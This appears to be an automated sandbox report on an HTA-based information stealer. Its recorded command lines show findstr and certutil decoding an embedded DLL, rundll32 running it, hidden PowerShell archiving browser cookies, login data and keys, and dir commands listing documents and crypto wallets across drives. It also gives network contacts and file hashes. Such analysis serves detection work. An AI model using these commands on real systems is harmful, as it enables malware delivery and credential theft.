PID 4640 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 5108 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 5108 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 5108 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 5108 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 5108 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 5108 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 4640 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 4640 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 4640 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 5108 wrote to memory of 1652 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 5108 wrote to memory of 1652 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 5108 wrote to memory of 1652 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 1652 wrote to memory of 1384 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 1652 wrote to memory of 1384 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 4640 wrote to memory of 640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4640 wrote to memory of 640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4640 wrote to memory of 640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1384 wrote to memory of 2888 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1384 wrote to memory of 2888 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1384 wrote to memory of 3836 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 3836 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 4940 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 4940 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 2960 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 2960 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 4864 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 4864 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 2028 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 2028 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 752 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 752 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log password.txt & del 1.log && password.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local & findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log netserv32.dll & del 1.log & rundll32 netserv32.dll,MainWork

C:\Windows\SysWOW64\findstr.exe

findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"

C:\Windows\SysWOW64\findstr.exe

findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"

C:\Windows\SysWOW64\certutil.exe

certutil -decode -f 1.log netserv32.dll

C:\Windows\SysWOW64\certutil.exe

certutil -decode -f 1.log password.txt

C:\Windows\SysWOW64\rundll32.exe

rundll32 netserv32.dll,MainWork

C:\Windows\system32\rundll32.exe

rundll32 netserv32.dll,MainWork

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\password.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -w hidden Compress-Archive -CompressionLevel Optimal -Path "C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp" "C:\Users\Admin\AppData\Local\micro.log.zip"

C:\Windows\system32\cmd.exe

cmd.exe /c dir C:\Users\Admin\*.hwp C:\Users\Admin\*.pdf C:\Users\Admin\*.doc C:\Users\Admin\*.docx C:\Users\Admin\*.xls C:\Users\Admin\*.xlsx C:\Users\Admin\*.zip C:\Users\Admin\*.rar C:\Users\Admin\*.egg C:\Users\Admin\*.txt C:\Users\Admin\*.jpg C:\Users\Admin\*.png C:\Users\Admin\*.jpeg C:\Users\Admin\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir C:\Users\Admin\*wallet* C:\Users\Admin\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir d:\*.hwp d:\*.pdf d:\*.doc d:\*.docx d:\*.xls d:\*.xlsx d:\*.zip d:\*.rar d:\*.egg d:\*.txt d:\*.jpg d:\*.png d:\*.jpeg d:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir d:\*wallet* d:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir f:\*.hwp f:\*.pdf f:\*.doc f:\*.docx f:\*.xls f:\*.xlsx f:\*.zip f:\*.rar f:\*.egg f:\*.txt f:\*.jpg f:\*.png f:\*.jpeg f:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir f:\*wallet* f:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 cdn.glitch.global udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 151.101.66.132:80 cdn.glitch.global tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 132.66.101.151.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 131.153.13.235:80 131.153.13.235 tcp
US 8.8.8.8:53 235.13.153.131.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\1.log

MD5 71593a662d03e58b27b29ab199a6d7b5
SHA1 d24e55399d35ac3a25f1b6a8d3bdd0e3e37db5d2
SHA256 e6da91d2fc4d3029e3915e9f7fc9586bf76f8ee024082c05ee4e5bf0f174c237
SHA512 c8005c9131b575f15ccd8bcde0fe66f820fff8b4c54800fdcaf814c1aede5f98343854276c301210c0935bf2669f925eafc2ecd15ff88496ededd918bfca3b07

C:\Users\Admin\AppData\Local\Temp\1.log

MD5 2ac7510166832b4a6e4344f37d944578
SHA1 c766dd5112d72620614842d4bf0e986c34c5a2d0
SHA256 09e4c6d57fbf21a95fab469149ac50d73ee046f2bc2e57b6565eb0e9adf9e1ad
SHA512 ecb5c29e8e1d81b914b1d4c3e2787cf2b78d5707473f368aa48df6af1b7235adac5f96ccd43cfc0501f93640b52dd4b06905c889ffd0e9b7c989e150c89e521a

memory/1652-9-0x00000000003B0000-0x00000000003CF000-memory.dmp

C:\Users\Admin\AppData\Local\netserv32.dll

MD5 56d4fcfa7eb3a84740081264c5c0f10a
SHA1 06edf5464d2cfe1a75f3600c9039eabab97248bd
SHA256 5a18a29791cfb18767a43bebb61f923e64be7988235213678514007174f60b3e
SHA512 df622d9aebc8b9367219777216ba7e21942974e048fa40233fb17d17a85d940f8301ab4c605703cfa4b9ffdc61f2095b2a96b6256d017b445e40e94aedfd8609

memory/1384-11-0x00007FFBF5DB0000-0x00007FFBF5DCF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\password.txt

MD5 6a0e721cb89a06736206b91af92239cd
SHA1 bb87db8bbcb512a584c45c80504fc21a0a972b3a
SHA256 a5a56f7eed7db360188ca88386bed5c84a8146b99ece4e68a3abfdbb5f091015
SHA512 c9921cafd2a284c3bc32b845685e25f03bc9fbaa380dbecbe8bfd9ec4992d5cf4a832e462cf097bcbc12f1ae3b00a0c8e7688be373aede81a9bd331d400b6a0c

memory/1384-18-0x0000000180000000-0x0000000180127000-memory.dmp

C:\Users\Admin\AppData\Local\net

MD5 de9438683614ccf3f0316139418985a9
SHA1 dcbbfb18c16f4bf9025233e6ecf42be64c33932d
SHA256 d5ec8265369b5f52a14b039c1f9495a343a9755a89b0c48db5983c94d140f18b
SHA512 925a919ecbe169adc2ebb10b9f93cc33ab5ba44794d3fccd0d7f2faa49c8a35b46e3c6779d0e357122433461bf48fc4af2f9571fae0aa11fd85c9dcc26a47470

memory/1384-22-0x0000000180000000-0x0000000180127000-memory.dmp

memory/1384-21-0x0000000180000000-0x0000000180127000-memory.dmp

C:\Users\Admin\AppData\Local\micro.log

MD5 311a2c063514a94a873bf8c7486547d8
SHA1 69305cc09546c3a0230d3d1ba87620766a442399
SHA256 eb83ccc9c9a14d52b8115f7e1da82097968cc8a5082f4031ccd0306538e42317
SHA512 26d76d75f1d4cd9113e7eb8e2681f0b5ecdbad336e5e50569acbf80b13b79b65e07f8a1a7afe489a27e49c9d94e45c93727b5e7e7bd1a3b9e8b702203bd4fccd

memory/2888-40-0x0000014DE9410000-0x0000014DE9432000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rgnp30tx.ord.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2888-50-0x0000014DEB940000-0x0000014DEB952000-memory.dmp

memory/2888-51-0x0000014DE9560000-0x0000014DE956A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\cc_Default_Cookies

MD5 6e86b6f358f5d778881937294b43ac24
SHA1 0b0de45f33ab9ee86fef84756bb7c5be8320702d
SHA256 19ed915b2701b0b3c5353db7dd045c126145584368bbdc33f3b9462280bf53fa
SHA512 dc524cfaf9c652f4ffb26feaa15b7ff60cc0b63ec70d3d7539b6472af70807b70a74378cb178fca4c54d9806249477dcaf5bde909f150b031f8907a8edd45726

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\cc_Default_Login Data

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\cc_Default_Web Data

MD5 ab87d892a202f83f7e925c5e294069e8
SHA1 0b86361ff41417a38ce3f5b5250bb6ecd166a6a1
SHA256 bdc61a1c60fe8c08fe7a5256e9c8d7ad1ba4dd0963a54357c484256fc8834130
SHA512 f9a03eaae52d7fb544047fea3ffa7d8c6f7debdbb907348adfc46545e7b6c3783427983f16885ae138e43e51eec6ce73520c38581e4d9bb7140beeae2137de41

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\cc_key

MD5 f470520743c3b6a01a4d7a0affbef2a4
SHA1 4318fb899fe1f21dfa6238ad25bcd2c3ec530d6b
SHA256 7d6fb14e76439291eb51c2c4df36cad871f430c94eabdff9759b5e094999b2ae
SHA512 981cfc2557a3d0016a996ff00ba1a73ab054543e01b1ec8856df5d4e683bbc7001d1925a9ff42b60d5cd3765d3316044ae73b51ce8b605d85820904c2bad317b

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\ee_Default_Cookies

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\ee_Default_Login Data

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\ee_Default_Web Data

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\ee_key

MD5 ab65b1a23524d73575e80dcbcf4b58b4
SHA1 eacf19cbda987f244512aba07376f4b10e6bbfa5
SHA256 d1791ebbb7a4954bbfd0a25226f1e2eac0a0d259b2a05eaa7cec64055b7f73e7
SHA512 8f3ba48bb83d1a0f42c9c546635b4128addc41d605cd9ed0f3ef5af6672452aad16651742755fded03f6439265738189d11f7405a62d790e5260a427de11df1f

C:\Users\Admin\AppData\Local\notepad.log

MD5 6199c9d0ad1df4105c85ae041e833a0e
SHA1 c9016a4bcd8bd2ea646dfa86e2c9c59cd9f50fd1
SHA256 c45b1bb615385f2b2b2c1bfb29646a89ef9beb9c4f00cbb5f16c02171c61bcf4
SHA512 b2b972ba63cfb93c6b59634ecf5f8ffda04c74ba9ee86dbd8fefea43ff408f86718a75a0e9282ba5fe122cb3079511847c6775393e1e2d5c556ec3e8ab599de3

memory/1384-71-0x0000000180000000-0x0000000180032000-memory.dmp

C:\Users\Admin\AppData\Local\micro.log.zip

MD5 149b2845d7cf4b695ad3a39975e216fc
SHA1 8137272305952a0d769349b1f70dcc4b1a7e43d1
SHA256 d81d7ef894a6b2d3386401f3842d0e403c01b2685a93eb815c2a78af1ff3b2d1
SHA512 5623d4a58f2064a8cb39d24722f3134219e551c93a2517eb8860750002f1df528f55849b078061c6a70ad34bf5d79afaad0af4e84e5b2ebfa65f438697a5c46f

memory/1652-91-0x00000000003B0000-0x00000000003CF000-memory.dmp

memory/1384-93-0x00007FFBF5DB0000-0x00007FFBF5DCF000-memory.dmp

\??\c:\users\admin\appdata\local\netlist.log

MD5 4557beea354d237448c61e02a2c7bd17
SHA1 877ba42bb43b02936d59ece114ed3ff33e906d96
SHA256 a725edb0ddde5d58c2206ef49009b3349935e0cd4cab37a3a3bc5c714afe9eff
SHA512 80f0f55b8108ba7efa7245e6a89f6a62c863626cc18d8b8c6b462f14e23816af5f2161366d2e8bc5542df6382658fdabaa17ed0b2bc39d9216e982acc2356421

\??\c:\users\admin\appdata\local\netlist.log

MD5 8f173962e10757f55ee5fb261e380f57
SHA1 4866b8eaf8820f3538b482b5dc8940426fc4cfa1
SHA256 af4e210293aad43094841bdaeb2cba8fd4efc8daf6f447acfc0d2851bb92673e
SHA512 be0eec3fa227dab33ab3a910fd9b89736f527533102f4c3e1012bf1dffc11e1d8df9c84a8d960c78271f3e2c0b0519c4d51128bfc3eafec6df85126c5617a2cf

\??\c:\users\admin\appdata\local\netlist.log

MD5 f3b90ce6c87b9de5edcdac1ac9b4c36f
SHA1 d41bcfeb2877e2520940820d17d690fef51b9b96
SHA256 385710e0b834abd20940156db5008e1657fcaaef344c143366a5252383531019
SHA512 72ee5fe1070078ff1b786a61ea3986bd5119a98d78f533727a1a39b78cd8d77edd456c8a47ab3b469b4b3c2c6f7bfccd18a4195289d47a191051cf6a743b9c2c

memory/1384-118-0x00007FFBF5DB0000-0x00007FFBF5DCF000-memory.dmp

memory/1384-119-0x00007FFBF5DB0000-0x00007FFBF5DCF000-memory.dmp